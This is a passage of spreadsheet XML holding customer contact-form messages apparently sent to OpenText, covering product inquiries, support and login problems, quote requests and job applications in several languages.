    <t>Hello.   We are a unified communications provider for two major Dental companies.   As part of that, we provide their incoming fax receipt services.    These two companies are receiving a high number of partial faxes from two Insurance Companies (~700 a month).   One of them has told us that OpenText is their fax provider.   We would like to work with someone at OpenText, simply to troubleshoot on behalf of our mutual customers.</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a ways to access:_x000D_
_x000D_
opentext Metastorm Integration &amp; Managed File Transfer api ?_x000D_
_x000D_
Can we automate the injection of variables into the UI?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to integrate and EIM platform with our EMR system </t>
  </si>
  <si>
    <t>need to load GXS Trusted link on new computer</t>
  </si>
  <si>
    <t>Login ID for Easylink Fax to Mail._x000D_
_x000D_
Hi,_x000D_
_x000D_
I believe the user that originally setup our group fax to mail service is no longer with the company and wanted to check it it would be possible to retrieve the login details and what would be required for this?- Our faxes are currently going to the email address plctreasury@pearson.com_x000D_
_x000D_
KR,_x000D_
Shawn</t>
  </si>
  <si>
    <t>Hello support_x000D_
_x000D_
I can not log on to the web, at any time I am asked to validate the email for more than I have already validated repeatedly_x000D_
_x000D_
please your help_x000D_
thank you.</t>
  </si>
  <si>
    <t>Because off service</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
I want your support to know how to modify in the role setting in order to make “read only” or “read and write”_x000D_
_x000D_
Also thanks to advise if there is a manual can be used to know more features about this application._x000D_
</t>
  </si>
  <si>
    <t>Hi there! I'm an employee with Oracle looking for some information on the Oracle Media Manager database your company supports. I'm located in their Reston, VA location and would like to touch base with you about this product. Would you have a moment to talk about this product?_x000D_
_x000D_
Cheers,_x000D_
Glenn Witt</t>
  </si>
  <si>
    <t>We have a very old installation of genio 7.1 which we still use for many live extracts.  However this is now out of compliance and we need to replace it while keeping the extracts running.  Do you have any information about an upgrade path to OTIC?</t>
  </si>
  <si>
    <t>I tried to send a fax to my eFax from a stand alone fax but I have not received it.  I am able to receive from email generated fax. What am I doing incorrectly?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
Ihnen einen angenehmen Nachmittag zuvorderst._x000D_
_x000D_
Ich schreibe Ihnen, da die ABDA im Zuge eines bald anstehenden Umzugs Ihre Informationsprozesse innerhalb der Zentrale in Berlin überarbeitet. Die ABDA e.V. ist die (Berliner) Spitzenvertretung der knapp 62.000 berufstätigen Apothekerinnen und Apotheker in Deutschland._x000D_
_x000D_
Erster und wichtiger Schritt zur effizienteren Gestaltung unserer Informationsprozesse ist eine Digitalisierung des Archivs. Ziel der Digitalisierung ist, die Informationen aus dem Archiv den Mitarbeiter*innen mit kurzen Such- und Zugriffszeiten in einer einfach zu bedienenden Umgebung zugänglich zu machen._x000D_
Da dies später auf die direkt am Arbeitsplatz verwendeten, bislang primär in Papierform existierenden, Dokumente ausgeweitet werden soll, haben wir uns mit dem Thema DMS beschäftigt._x000D_
_x000D_
Da Ihre Lösung, ApplicationXtender, auf unserer Shortlist gelandet ist, würden wir uns freuen, wenn Sie uns an dieser Stelle mittels eines Demozugangs ermöglichen würden, auf einer generischen Umgebung die grundlegenden Bedienelemente kennenzulernen. Quasi ein virtueller Messebesuch._x000D_
_x000D_
Uns ist gänzlich bewusst, dass ein Projekt davon lebt, auf die einzelnen User abgestimmt zu werden und jede Instanziierung sich unterscheidet. Wir haben bezüglich des Umfangs und der Integrierbarkeit von Features einiges an Recherche geleistet und sind deshalb sicher, dass der ApplicationXtender grundsätzlich gut in unsere Infrastruktur passt und allen Anforderungen genügt. _x000D_
_x000D_
In diesem Schritt geht es uns mehr um ein look and feel. _x000D_
Aus diesem Grund reicht eine vanilla-Umgebung gänzlich._x000D_
_x000D_
Es wird zu späterer Zeit auch noch genügend Chance für ein Treffen vor Ort sein, bei dem wir uns dann mit Vergnügen im persönlichen Gespräch von den Vorzügen OpenTexts als Projektpartner und der angebotenen Lösungen überzeugen._x000D_
_x000D_
Wenn Sie noch Fragen haben, rufen Sie mich gerne morgen, 2.11.2018, von 0930 bis 1100 oder von 1330 bis 1430 an: +49 30 4004 154_x000D_
Si</t>
  </si>
  <si>
    <t>We want to file an inquiry into the scope of our business relationship in order to ascertain whether personal data (as it is outlined in article 28 of the GDPR) was/is being transferred._x000D_
Please provide us with the contact details of somebody at your organisation who can process our request.</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in a demonstration of your WFO/WFM products. We would like to review our needs and interests with you in a pre-meeting. Thank you. </t>
  </si>
  <si>
    <t>Created an user account but cannot open a support case and support knowledge.</t>
  </si>
  <si>
    <t>Seeking high level estimate to convert our XML Bill output to AFP format - to determine feasibility of project to replace out Bill Print Vendor.</t>
  </si>
  <si>
    <t>Download of Teleform 16.3.1 release/not able to register MySupport account.</t>
  </si>
  <si>
    <t>Please contact me regarding document and asset management._x000D_
Thanks,_x000D_
Greg</t>
  </si>
  <si>
    <t>We are looking for IT Solution/Product with the following Functional Capabilities.  Pls contact us for further discussion._x000D_
•	Archival of executed (Treasury Legal) agreements_x000D_
•	Maintenance of agreement terms in the system _x000D_
•	Data Search, extraction and reporting_x000D_
•	Maintenance of Agreement and over-the-counter (“OTC”) Termsheet and Structured Notes templates_x000D_
•	Automated production of draft ISDA/CSA/GMRA/GMSLA documents_x000D_
•	Interfaces/Integration to back office systems</t>
  </si>
  <si>
    <t>IS</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Sindri Olafsson and I work as an analyst for Landsbankinn, a bank in Iceland. We are currently looking into replacing our current document capturing and indexing solution. This is the first iteration for selecting a new solution where we are looking for our top three solutions to look further into. We are using Oracle Webcenter Content as our content management system and we are looking for a Document capturing and Indexing solutions which can integrate seamlessly with Oracle Webcenter Content. The key feature of the solution needed is to be able to scan documents and index them into Oracle Webcenter Content, indexing will be done with barcodes.  If you believe that your Document capturing and indexing solution could be a good fit for us we would be very thankful if you could arrange a live demo of your solution to demonstrate its potential via a video meeting. To make the demo as efficient and useful as possible we have set up a script of actions we would like to see demonstrated in the demo, the script is attached._x000D_
_x000D_
Note 1: We will use barcodes (1D or 2D) to separate documents and to index the documents. Either all metatags for the document will be included in the barcode or the barcode will look up the metatags through a database. _x000D_
_x000D_
Note 2: OCR and ICR is not the main feature we are looking for since most of the indexing and seperation of documents will be done with barcodes with already known information. _x000D_
_x000D_
Must have requirements:_x000D_
_x000D_
- Scan documents into Oracle Webcenter Content_x000D_
-- Individual documents and bulk of documents_x000D_
- Import documents into Oracle Webcenter Content_x000D_
-- Individual documents and bulk of documents_x000D_
- Use barcodes (1D or 2D) to separate documents_x000D_
- Use barcodes (1D or 2D) to index documents_x000D_
- Indexing with a database_x000D_
- Lookup in database to index documents_x000D_
- Indexing documents manually_x000D_
- Only relevant indexing field are shown for each document_x000D_
-- i.e. Scanning profiles_x000D_
_x000D_
Nice to have requirements:_x000D_
_x000D_
- OCR or</t>
  </si>
  <si>
    <t>Need to discuss a customer requirement for Document Management System</t>
  </si>
  <si>
    <t>Job Opportunities</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I use opentext Media management  in my work but I feel I need to learn more about its operation. Do you have a user manual i could get?_x000D_
_x000D_
thank you_x000D_
_x000D_
Tom_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We need an archiving system to save copies of the original documents, as original documents could be shred after some time. _x000D_
In addition, it helps all departments  to achieve copies without referring to originals which considers very risky _x000D_
to handle original documents on a daily basis._x000D_
</t>
  </si>
  <si>
    <t>Hi, I am working as Project manager at Hyperion in Sweden (Sandviken). We are just in the start to look for a solution for print management and searching for all demands on a new solution. One thing that came up in the discussion was what demands Streamserve have on a print management service, we have streamserver in the OEM license we have through Infor M3 licenses. Is there any special demands that we need to think about when it comes to StreamServer and a print management service?_x000D_
_x000D_
Best regards_x000D_
//Maria Israelsson</t>
  </si>
  <si>
    <t>Request for contact to discuss your ECM offering and services. Thank you.</t>
  </si>
  <si>
    <t>Not able to take Print through Google Chrome in EDMS Software._x000D_
Need Solution.</t>
  </si>
  <si>
    <t>AAAA內容AAAA</t>
  </si>
  <si>
    <t xml:space="preserve">I saw the job post on jobstreet app and I am interested in making my application. </t>
  </si>
  <si>
    <t xml:space="preserve">Scanner compatibility issue with Opentext version 3_x000D_
</t>
  </si>
  <si>
    <t>I can't set my initial password.  I received the following confirmation email from connect@opentext.com, but I'm getting an error when setting my initial password.  _x000D_
_x000D_
Registration Confirmation_x000D_
Dear Julio AguilarChang, _x000D_
Congratulations! You now have access to the Online Support Resources available through My Support._x000D_
•	Your User ID: jachang@lanl.gov_x000D_
•	Welcome and FAQ: ..._x000D_
To finalize your account creation, please click on the following link and set a password for your account: ...</t>
  </si>
  <si>
    <t xml:space="preserve">I found an artifact I am interested in trying out to convert email.  I am self employed.  Am I eligible to use your software?_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I was trying to download the 45 day trial of iHub as a VMWare image, but wasn't successful and always received the Windows version. Would you kindly provide me with a download link, so I can evaluate of iHub would be a viable alternative to our current BIRT reports._x000D_
_x000D_
Kindest regards_x000D_
Dennis Spiegel</t>
  </si>
  <si>
    <t xml:space="preserve">Microsoft asked us to integrate Azure AD provisioning to OpenText for automated user account creation, update and deletion from Azure AD. To do this we need access to a test instance with user management APIs. Do you know who I can talk to about this?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to reach learning services to obtain a digital copy of course material for a course that I recently took. </t>
  </si>
  <si>
    <t>I set up an account to access the knowledge base, but I am unable to get in. I reset my password, but get a server error when trying to use it. Can you assist?</t>
  </si>
  <si>
    <t>Our company is in the early stages of evaluating ECM and/or data classification systems. If possible, we would like more information regarding OpenText's implementation process and discuss what is needed from our company to come up with a ROM estimate.</t>
  </si>
  <si>
    <t>Request for 1 year and 3 year quotes on support contract for RightFax.  Please contact me._x000D_
Contract number RC066799_x000D_
SUID:  75871-12248</t>
  </si>
  <si>
    <t xml:space="preserve">I sent in a request for contact last week and have not heard back from anyone yet. I am interested in the Documentum product line._x000D_
</t>
  </si>
  <si>
    <t>To whom this may concern:_x000D_
_x000D_
This is for technical support. We have aquired another firm (Short Cressman &amp; Burgess) who used LegalKey. As of this week, when users try to start LegaKey, they are prompted that the "Main Console has stopped working."_x000D_
Please let me know what further information/details is needed._x000D_
_x000D_
Thank you,_x000D_
Jared S.</t>
  </si>
  <si>
    <t>Question regarding MFD integration: Does the OpenText Connector for Xerox MFDs support the new AltaLink and VersaLink products?</t>
  </si>
  <si>
    <t xml:space="preserve">I am a coop teacher of adults who are available for coop placements where they work as volunteers for 3 months to get Canadian experience and a reference.  I currently have a QA/QC person and a Data Analyst available, both with experience.  They are available for interviews immediately and can start right away as well and work fulltime hours until Jan.25, 2019.  The program then starts again in February and runs til the end of June.  _x000D_
If you are interested, you can reach me at 416-395-4417 x 20158 or by email and I will send the resumes for your review.  In 21 years at this school, thousands of students have successfully worked in companies and are now working in Canada thanks to the help of our host companies.  </t>
  </si>
  <si>
    <t xml:space="preserve">Need recommendation and quote </t>
  </si>
  <si>
    <t>Interest in your forms product - Live office</t>
  </si>
  <si>
    <t>I need contact information for the manager of my region.</t>
  </si>
  <si>
    <t>I'm a municipal government technology consultant. I help cities, towns, counties and special districts select, acquire and implement enterprise solutions for financial, people, utility, and asset management solutions. My clients are US-based agencies with FTE count between 250-1000 and population between 50-250K. I'd like to speak with a sales rep regarding your product offerings for the US mid-market municipal government sector.  Thanks, Tam</t>
  </si>
  <si>
    <t>Good afternoon, _x000D_
I'm the European IT Manager of the American group Franklin Electric._x000D_
By a market research we discovered your company is specialized in electronic invoice._x000D_
By 1th of January, in Italy electronic invoice B2B and B2C will be mandatory._x000D_
We are looking at a global enterprise solution. Our ERP system is Oracle JDE E1 9.1._x000D_
Could you contact me to discuss about this? If it's possibile to have an Italian contact is better._x000D_
Thanks you._x000D_
Best Regards._x000D_
Paolo Canevarollo</t>
  </si>
  <si>
    <t>Registration setup password is failing when we try to update the password for kleatherman@auditor.in.gov</t>
  </si>
  <si>
    <t>As a partner, do i have access to the support forums?</t>
  </si>
  <si>
    <t>Estamos com uma versão antiga do documentum que está com o fim de suporte próximo e não teremos tempo hábil para fazer o upgrade, por isso preciso de uma proposta para o suporte estendido do documentum.</t>
  </si>
  <si>
    <t xml:space="preserve">Merhaba ,_x000D_
_x000D_
Borsa İstanbul olarak Document Repository ihtiyacımız bulunmaktadır. Bu kapsamda çeşitli firmalarla iletişimde olup POC yapmaktayız._x000D_
Bu sürece EMC de eklemek istiyoruz. _x000D_
Ürün hakkında bilgi almak ve POC yapmak istiyoruz._x000D_
Konu hakkında görüşmek için toplantı organize etmemiz mümkün müdür?_x000D_
İletişim bilgilerim aşağıda bulunmaktadır. Geri dönüşünüzü beklemekteyiz._x000D_
_x000D_
Aydın Kurtoğlu _x000D_
İş Analisti_x000D_
GSM 	= 0 505 084 25 37_x000D_
Tel	= 0 212 298 26 78_x000D_
</t>
  </si>
  <si>
    <t>Hello there,_x000D_
_x000D_
 I'm seeking the EULA or Terms and Conditions for EnCase software, in order to review it in the hope of facilitating a sale. Could you please provide the document or a link to the web page? Please contact me by email rather than phone for ease of contact._x000D_
_x000D_
Kind regards,_x000D_
Ellis Young</t>
  </si>
  <si>
    <t xml:space="preserve">Ich möchte die Dokumentation des Enterprise Connect SDK nutzen (für eine Einbindung in Micrsosoft Office VBA). Ich bin Mitarbeiter der DB Systel GmbH, die Kunde Ihres Produktes ist. Leider verwehrt mir das System (nachdem ich mich für den Support registriert habe) jedoch den Zugriff auf die Supportinhalte. </t>
  </si>
  <si>
    <t>Wir sind auf der Suche nach einer DAM-Lösung. Im ersten Schritt möchten wir unsere Mediendaten zentral ablegen, organisieren und die Zusammenarbeit mit den Agenturen verbessern. In den nächsten Jahren sollte das System eventuell an diverse Systeme angebunden werden. (Sitecore, SAP, Social Meda, ...)_x000D_
Ich bitte um Kontaktaufnahme!_x000D_
Mit freundlichen Grüßen_x000D_
Mathias Gnigler</t>
  </si>
  <si>
    <t xml:space="preserve">Special bid needed!_x000D_
Dear Sir or Madam,_x000D_
_x000D_
We are a wholesaler / reseller of all types of software in the Netherlands._x000D_
_x000D_
For one of our clients we are looking for the following product:_x000D_
_x000D_
25 X Open Text Exceed X-Server Version 15 New License ESD Version 15 Volume License Level 20-49_x000D_
25 X Open Text Exceed Version 15 Maintenance 12 Months ESD Level 20-49_x000D_
Customer type: Commercial _x000D_
_x000D_
Please can you send us a reseller quote for this license, and more important, is there a reseller discount available? _x000D_
_x000D_
If we need to order online, please note that the website should allow us to register the license to the end-user. Alternatively we can send a purchase order containing the end-user details._x000D_
_x000D_
We can pay with credit card or Paypall. However we prefer to pay on 14 day invoice._x000D_
_x000D_
We thank you for your quick response._x000D_
_x000D_
Met vriendelijke groet, Kind Regards,_x000D_
Ted de Goey_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
For a customer of ours we are looking for the following: _x000D_
25x Open Text Exceed X-Server Version 15 New License ESD Version 15 Volume License Level 20-49_x000D_
25x Open Text Exceed Version 15 Maintenance 12 Months _x000D_
Could you send me a quote for this? Can we receive a resellers discount since we are trying to win a bidding._x000D_
_x000D_
Thank you very much_x000D_
_x000D_
Kind regards,_x000D_
Peter Buck</t>
  </si>
  <si>
    <t>Hi, we are interesting in an initial discussion and demonstration with respect to your Exstream content management application.</t>
  </si>
  <si>
    <t>Looking for predictive analysis software</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we currently use opentext in a production environment but seeing bad volumes - I am trying to raise a support ticket but not having much success at the moment, please could you confirm our support status? </t>
  </si>
  <si>
    <t>Interesse am Invoice &amp; Document Management</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to discuss a potential investment opportunity in the Canadian Women's National Field Hockey Team. My name is Nicole Woodcroft and I have been a member on the team since 2015.  The team is currently centralized in Europe training and competing in the Belgium and Holland club leagues.  We are using our time in Europe to play in a high-level club league while training together with specialist trainers to enhance our skills and advance our team play quickly. In order to put what we are training into play, we are organizing a tour to Spain in December 2018 and a tour to Asia in January 2019. It is crucial for us to play games to continue on our pathway and to be fully prepared as we approach qualification for the Tokyo 2020 Olympic Games. _x000D_
_x000D_
Recently the Women's National Team has struggled financially, and with our ultimate goal to qualify for Tokyo2020, we have a lot on our minds. Field hockey is not a large sport in Canada so unfortunately, we do not receive the same amount of funding as other sports, such as ice hockey and soccer Canada. We are, therefore, left to do some of our own fundraising. Recently we have begun a Business Club as a way to help raise funds to support our dream of representing Canada at Tokyo2020.  The Women’s National Team is embarking on a Partnership Program with a Business Club of local &amp; national partners. The Business Club will be made up of business &amp; individual sponsors eager to financially support a group of highly driven females dedicated to Olympic goals. _x000D_
_x000D_
We are currently at the point where we are starting to reach out and see the possibilities for support for our team.  The next step, if you are interested, would be a conversation with a representative from Field Hockey Canada (Mike Gillis) to discuss more details related to supporting our team. If you have questions at all about anything please don't hesitate to reach out. _x000D_
_x000D_
I have attached a letter written by our team captain as well as a document outlining </t>
  </si>
  <si>
    <t>i need to have sales contact details for recommended Golden partner located in UK , i need to have quotation for license .</t>
  </si>
  <si>
    <t>We recently held the first conference on Digital Transformation i Oslo with partners like SAP, Microsoft and KPMG with great success. In conntection with the next DT-conference (October 9th, 2019 in Oslo) we are seeking additional partners that can further improve the quality of this event. If this is interesting for OpenText please let me know and I will send additional info. Best regards, Lars Kolberg</t>
  </si>
  <si>
    <t>We are looking for a solution for primarily eCTD but also a platform for DMS. _x000D_
_x000D_
Do you provide cloud-based tools for this?</t>
  </si>
  <si>
    <t xml:space="preserve">On 19.10.2018 we received CHF 2271.45 without information. Please let us know what you are paying. Name, first name, date of birth and the address of the insured person. Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We need to stop the service of EasyLink TradeGateway Services and we have sent email to your account manager on Sept. 28, 2018. We have got no reply and your company has still put our company in active and charge us every month by autopay. We have no channel to reach your account manager. Please take the above issue serious and handle it immediately before we send the complaint to the Consumer Council. </t>
  </si>
  <si>
    <t>Request for trial download of OpenText CS 16.</t>
  </si>
  <si>
    <t>Would like to know your capabilities and if you can help us better compete with our main competitor IBM.</t>
  </si>
  <si>
    <t>Hello, I'm looking to upload an audio transcript and perform sentiment analysis on that script</t>
  </si>
  <si>
    <t>Recovery Email not going to Stephanie@Electricyoga.com</t>
  </si>
  <si>
    <t>Need to reset password</t>
  </si>
  <si>
    <t>I've been trying to contact a sales representative for over two weeks, I spoke already with two representatives and still nothing, I need pricing information in regards a DMS software, your cloud services and Mobile applications. Please contact me as soon as possible. We are interested in your services as a company for one of our clients in Spain. We are based in Mexico.</t>
  </si>
  <si>
    <t>How can I test Brava for Sharepoint??</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for solution to manage and print letters and forms merged with data.  We have a lot of templates and high volume printing.  Do you have product for something like this? </t>
  </si>
  <si>
    <t>Good evening, _x000D_
I have recently applied online to an open position at the Ottawa location. Originally on my account there was a section that listed the positions I had applied to. This is no longer visible. I was wondering if this means that my application has been rejected or if there was a technical error._x000D_
_x000D_
Thank you in advance, _x000D_
Colleen</t>
  </si>
  <si>
    <t>Need Support for Box Number 94241002</t>
  </si>
  <si>
    <t xml:space="preserve">we are an apparel manufacturing company. currently setting up a new business relationship with Macy's and they require your UPC Catalog. how does this work? we are buying UPC codes from GS1. </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We're a technology services company, with annual turnover of over $ 800mn, with a Digital Business group that contributes around 47% of these revenues. We have a rapidly growing Content &amp; Commerce practice, where we have partnerships with and deliver solutions on Adobe, Sitecore, Magento, Hybris etc. One of our clients in North America, a large global player in the spirits industry with over 1.8bn Euros annual revenues, has engaged us for some of their key Digital transformation initiatives - as part of this, we are looking to implement the Opentext DAM solution globally. _x000D_
We currently do not have a partnership in place with Opentext, but would like to have a discussion asap to understand how we can partner together, starting with this opportunity. _x000D_
_x000D_
I'd appreciate it if someone could get in touch with me tomorrow, Wednesday the 31st October, so that we can kick off these discussions. _x000D_
_x000D_
Thanks and best regards, _x000D_
_x000D_
Suman</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to download the paid software we purchased via your website, the instructions provided are incorrect. Trying to "wing" the download also is difficult, as the OpenText activiation site is not easy to understand.  My efforts to contact support by phone renders an error message when trying to click on your contact webpage, whereas the page keeps rendering an error message "Contend Server Error:  Error Processing Request".  _x000D_
_x000D_
Here are some details I received from the Purchase Order which I hope allows you to track this down._x000D_
_x000D_
21692875 _x000D_
310601010 _x000D_
Guidance Software EnCase Basic SMS 1 year Multiple platforms _x000D_
English ESD Software Maintenance </t>
  </si>
  <si>
    <t xml:space="preserve">Please quote: _x000D_
_x000D_
OpenText_x000D_
Guidance Software: EnCase Mobile Investigator for EnCase Endpoint Investigator (includes up to 5 licenses) – Electronic License – 1 Count_x000D_
Guidance Software: EnCase Mobile Investigator for EnCase Endpoint Investigator (includes up to 5 licenses) – Maintenance – 1 Count_x000D_
                Guidance Software: EnCase Mobile Investigator Uncapped Component License – Qty 10,000 Licenses – 1 Count_x000D_
                EnCase Mobile Investigator Uncapped Component License Maintenance 12mths Support For 10,000 Licenses – 1 Count_x000D_
                EnCase – Hourly Consulting (Includes Expenses) – 40 Count_x000D_
                Guidance Software: 1 yr OnDemand EnCase Annual Training Passport – 3 Count_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a new employee here at Ochsner assigned to the Decommission Team.  I'm trying to get a leg up by researching possible vendors who handle decommissioning applications that are know longer needed.  OpenText / InfoArchive sounds like something that may work for us.  For now, I would like to get some sort of overview and insight on how this product/service may be of great use to us.  Like I said, I'm brand new here so not sure if outsourcing would even be an option, but wanted to get info first.  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Gia Zghuladze and I'm representative the company UGT, which is the biggest integrator company in Georgia._x000D_
Now, I am interested about product "documentum" for one the my large client in Georgia._x000D_
When we can make small conference call for more details ? _x000D_
Can we make conf call in Russian language ?_x000D_
_x000D_
BR,_x000D_
_x000D_
Gia</t>
  </si>
  <si>
    <t xml:space="preserve">After a patch was pushed to our Windows 10 box, we are having an error where the desktop icons are not visible.  When you right click on the desktop and toggle show/unshow desktop icons an exceed installation dialogue pops up and begins trying to install.  _x000D_
_x000D_
Is this a problem you have seen before?  We are running Exceed 15.  </t>
  </si>
  <si>
    <t>Follow up on the charges we have been receiving.   Our account is US01-AM453.</t>
  </si>
  <si>
    <t>Access to My Support</t>
  </si>
  <si>
    <t>Hi, I am a native English speaker currently living in Germany and applied for your inside sales representative position on your careers page based out of Frankfurt, Germany. I am eager to get into further contact to discuss the position and was wondering if I could be connected with the HR department? Thanks!_x000D_
Joseph Barron</t>
  </si>
  <si>
    <t>Job application regarding Corporate and Securities Law Clerk</t>
  </si>
  <si>
    <t>Please provide access to opentext OTMM online knowledge documentation.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know more about your products and cost </t>
  </si>
  <si>
    <t>customer is wanting a reseller quote from Dell- Account Northwell Health</t>
  </si>
  <si>
    <t>Looking for contact who would work with State of Louisiana.  Someone named "Kerri".</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Armine Shahbazyan and I'm ex-employee of Hightail, which is now part of Opentext. I need a copy of my W-2 for 2017. I tried to contact the HR department but haven't heard back. This is time sensitive matter and I need it ASAP. Could you please give me a direct contact of HR to get the copy of my W-2._x000D_
_x000D_
Thank you,_x000D_
Arimine</t>
  </si>
  <si>
    <t>Looking for pricing and information on RightFax or Online faxing tools.</t>
  </si>
  <si>
    <t>i want to download the tool. i can not find the link for that. what can i do</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to get Rightfax to work on our Ricoh machines. </t>
  </si>
  <si>
    <t>W are running encase.  I have recently inherited the application.  We show the examiner service is not running on the server in services, however, the service is running in the background.  The issue is reported by our service monitoring setup internally.  The system log reports event id 7036 for the start and stop of the service.  It appears the service is running only when initiated for an application process.  I would like to understand more about the service and whether our monitoring of the service could be corrected to monitor a different way if needed._x000D_
Thank you,_x000D_
Todd Bengert_x000D_
716-842-4638</t>
  </si>
  <si>
    <t>Looking for pricing of an on-prem fax solution for our agency.  App 20 phone numbers, 415+ staff, 17+ locations, and I need to deploy it before the end of 2018.  One of my team highly recommended you.</t>
  </si>
  <si>
    <t>What is the latest Encase version that will support Mac OSX APFS? Thanks.</t>
  </si>
  <si>
    <t>I am having problem login in, my login and password are not working. I need to view the violations and detail and learn how to fix the problem that is causing them. Please help. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
_x000D_
ich würde gerne mit Ihnen bezüglich Ihres Kununu-Ratings sprechen._x000D_
Würde Ihnen Montag (5.11.2018) um 9:30 Uhr passen?_x000D_
_x000D_
Schönen Gruß Markus Dutschke_x000D_
_x000D_
-- _x000D_
Markus Dutschke AuXolutions_x000D_
Flemingstrasse 10_x000D_
86199 Augsburg_x000D_
</t>
  </si>
  <si>
    <t>Dear Sales team, _x000D_
I am currently interested about your fax cloud service .  I would need to somewhat keep our existing fax number (phone provider mapping beetween phone number , belgium phone number to cut costs) . We should be able to send an receive fax  . Send via web portal or virtual printer on PC .  Receive via email to pdf format via email hosted on premise._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Guillaume Migaszewski</t>
  </si>
  <si>
    <t>Hi, I would like to have a contact to drive a RFI process with OpenText.</t>
  </si>
  <si>
    <t>I would like to discuss OTC's platform for our supply chain innovation coming online in the near future.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to evaluate offerings on Digital experience platforms "OpenText Experience Suite" . can you schedule meeting and  come up to our office for discussions and a demo if possible_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText Records Management, eDocs edition eDocs (RM): Price of the product </t>
  </si>
  <si>
    <t>Für die EDI-Anbindung unseres Kunden NISSAN Motors United Kingdom in Sunderland benötigen wir einige EDI-Daten von EASYLINK._x000D_
Seit 3 Wochen ist niemand zu erreichen; Rückrufe werden nicht getätigt. Unser Kunde ist jetzt in Eskalation gegangen._x000D_
Deshalb unsere dringende Bitte um Unterstützung!_x000D_
_x000D_
Mit freundlichem Gruß,_x000D_
_x000D_
Dietmar Auer</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get the support details to open a case with Open Text directly. thanks </t>
  </si>
  <si>
    <t>I need access on knowledge center</t>
  </si>
  <si>
    <t>One of my law firm customer is looking for physical file management solution, and seems like LegalKEY is quite popular in the industry. Could you please contact me so we can look deep into the details? Thank you._x000D_
_x000D_
Regards,_x000D_
Lin</t>
  </si>
  <si>
    <t>Our company use Brava for sharepoint and we need to buy it. I didn't find how to order "Brava! for SharePOint – all features" with your site._x000D_
Нope for your help</t>
  </si>
  <si>
    <t>zz内容zzzzzzzzz</t>
  </si>
  <si>
    <t xml:space="preserve">Need a demo of Opentext , looking for enterprise content management systems to store, retreive and search data </t>
  </si>
  <si>
    <t xml:space="preserve">We have a Tableau TD2u (Serial: D27590A0) The click were the SATA cable connect to the device has snapped off and only the 5 metal pins remain. Where can we send this for repair?  </t>
  </si>
  <si>
    <t>Just joined the Market Solutions team in July and wanting to understand the service offering, have potential use case opportunity as an incumbent is exiting the space and we are looking at potential future options.</t>
  </si>
  <si>
    <t>Hi, I am using the Open Source version of BIRT and the Open Source Web Viewer (installed and running in Tomcat) to share some reports with a small group of users (&lt; 10).  Currently there is no security (other than being connected our the office network).  But we would not like to implement permissions. I am hoping you have a commercial solution that includes a security model where users are required to login and certain reports can be granted access to certain users.  I would like to know what the pricing is for that solution and if I can easily migrate my existing open source birt reports into that solution?  Right now we are looking for an on-premise solution._x000D_
_x000D_
Thanks,_x000D_
Gavin Das</t>
  </si>
  <si>
    <t>Hello, I am working to renew the support for our Captiva software in use at the United States Citizenship and Immigration Services (USCIS). We require documentation that speaks to section 508 compliance of the software. Can you let me know if this documentation is available or point me to someone that can? This is time sensitive so your help is greatly appreciated. Email is the best way to get me david.dahler@uscis.dhs.gov Thanks!</t>
  </si>
  <si>
    <t>Transitioning from Viewpoint Construction Management (VCM) and interested in learning about the future of the Invoice Router and ApplicationXtender components of that product. It is my understanding the Viewpoint will no longer develop the product and that you as the original developer may continue to do so. I would like to know what potential replacement platforms/products does OpenText have available.</t>
  </si>
  <si>
    <t>Looking to test a demo of OpenText Secure MFT.</t>
  </si>
  <si>
    <t>I had a disk crash and need to re-install TD 6.2.  Can you please send me a link for a full installation as well as a product code.  Thank you.</t>
  </si>
  <si>
    <t>problem with 301 340 4000 calling my 90 year old mother.  No one at that number.  dialing zero not working.  Greater problem with Fax the Mail whom your company handles. pls call me</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Our partner, Nokia, informed us that their SSL certificate has changed. According to them,_x000D_
_x000D_
Existing Certificate Serial No :‎  0f 39 2a ab a9 7b 67 de 1c 28 17 d8 49 f1 4e 78_x000D_
New Certificate Serial No : ‎‎  ‎03 fb 87 1b 28 09 e3 b9 e8 d4 22 a2 51 5f 52 55_x000D_
_x000D_
Do you need to update something on your side for us to continue interchange EDI transactions with them?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Arkady Veyts</t>
  </si>
  <si>
    <t>Looking for price for 1 standalone Provision license.  No bells/whistles.  Just looking to do some basic business process modeling, along the lines of the Zachman Framework.  Had used it years ago at Ford Motor Company and found it nice diagramming tool.  Thank you.  -Terry</t>
  </si>
  <si>
    <t xml:space="preserve">Vinsys Information Technology is a SBA 8(a) Certified and GSA IT 70 Schedule, We have been Requested Quotation  by Railroad Retirement Board for OpenText Execute 360 Maintenance  Renewal. </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I have created by account today and asked for MySupportAccess as well . I got 1st account confirmation email and after that my support confirmation email . I confirmed both links in both email but it still says "No Access_x000D_
